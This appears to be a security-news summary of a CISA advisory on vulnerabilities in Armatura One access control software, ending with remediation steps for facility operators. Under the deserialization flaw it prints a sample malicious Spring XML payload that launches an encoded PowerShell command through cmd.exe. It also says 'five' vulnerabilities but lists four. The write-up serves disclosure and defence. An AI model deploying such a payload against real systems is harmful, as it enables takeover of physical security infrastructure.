The Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency industrial advisory (ICSA-26-274-01) warning of a critical vulnerability chain in Armatura One, a premier physical access control system (PACS) and security management software deployed across critical manufacturing, energy substations, data centers, and transportation facilities. The software embeds a vulnerable message broker susceptible to unauthenticated remote code execution (CVE-2023-46604, CVSS 9.8) and relies on hardcoded cryptographic keys and universal database superuser credentials (CVE-2026-94591, CVE-2026-94592), enabling complete operational takeover of physical security infrastructure.

Physical Access Control in the Crosshairs of Critical Infrastructure

Armatura One serves as the central orchestration brain for physical perimeter security across enterprise and industrial sites. It commands IP-connected door access controllers, optical biometric turnstiles, vehicle barrier gates, elevator floor access dispatchers, and integrated CCTV surveillance cameras.

When an adversary achieves administrative control over an Armatura One server, the consequences transcend digital espionage: attackers can remotely unlock facility perimeter gates, bypass badge badge authentication, suppress physical intrusion alarms, and harvest biometric records (fingerprint templates and facial recognition vectors) of facility personnel.

Anatomy of the Vulnerability Cascade

CISA's advisory documents five severe vulnerabilities affecting all versions of Armatura One prior to v4.7.2 (and USA builds prior to v4.6.1):

1. Remote Code Execution via OpenWire Deserialization (CVE-2023-46604)

To coordinate real-time event telemetry between server services and field door controllers, Armatura One bundles an embedded instance of Apache ActiveMQ, binding the OpenWire protocol listener to 0.0.0.0:61616 by default.

Because the bundled ActiveMQ version is unpatched, it suffers from the infamous ClassPathXmlApplicationContext deserialization vulnerability. An unauthenticated network adversary can send a crafted OpenWire packet instructing the service to load a remote XML configuration file, instantiating arbitrary Java classes and executing OS commands with NT AUTHORITYSYSTEM or root privileges:

<!-- Malicious Spring XML payload fetched by ActiveMQ OpenWire listener -->
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>cmd.exe</value>
                <value>/c</value>
                <value>powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAt...</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

2. Static Cryptographic Keys & Initialization Vectors (CVE-2026-94591)

To protect backend database and broker connection strings, Armatura One provides an option to encrypt sensitive configuration files using AES-128-CBC. However, reverse-engineering of the installation binaries revealed that the 128-bit AES encryption key and Initialization Vector (IV) are hardcoded strings embedded directly in the vendor's compiled DLLs. Any attacker with access to a public evaluation installer can extract the key and decrypt encrypted configuration files offline.

3. Universal Hardcoded Database Superuser Credentials (CVE-2026-94592)

During automated database provisioning, the Armatura One setup routine creates the database superuser account using a static, vendor-defined password rather than generating a randomized cryptographic secret per deployment. An attacker with network access to the database port (PostgreSQL or SQL Server) can authenticate immediately with full administrative rights.

4. Plaintext Credential Logging in Backup Bundles (CVE-2026-94593 / CVE-2026-94594)

When operators generate system backups or diagnostic support bundles, Armatura One records the complete command invocation—including the plaintext database superuser password and broker credentials—into unencrypted text logs (backup_restore.log), allowing unprivileged local users to harvest credentials.

Vulnerability Identifier CWE Weakness CVSS Score Attack Vector Exploitation Impact
CVE-2023-46604 CWE-502 Deserialization 9.8 Critical Network (Port 61616) Unauthenticated Remote Code Execution as SYSTEM
CVE-2026-94591 CWE-321 Hard-coded Cryptographic Key 8.4 High Local / File Access Decryption of database connection secrets
CVE-2026-94592 CWE-798 Hard-coded Credentials 8.4 High Network / Local DB Database superuser authentication
CVE-2026-94593 CWE-532 Sensitive Info in Logs 7.8 High Local File System Plaintext credential leakage in backup logs

Defensive Remediation Checklist for Facility Asset Owners

  1. Deploy Armatura One v4.7.2 / v4.6.1_USA: Immediately upgrade all primary and redundant access control management servers. The update replaces vulnerable ActiveMQ binaries, revokes static keys, and enforces unique database password generation.
  2. Firewall ActiveMQ OpenWire Port: Ensure TCP port 61616 is strictly blocked at host firewalls and network switches, permitting access only from localhost loopback.
  3. Rotate Database Passwords: Manually change the administrative superuser password for the Armatura database instance and restart access control services.
  4. Enforce Purdue Model Physical Security Segmentation: Place PACS servers in a dedicated Physical Security VLAN (Purdue Level 3 Ops DMZ). Prohibit direct routing between corporate end-user workstations and access control management interfaces.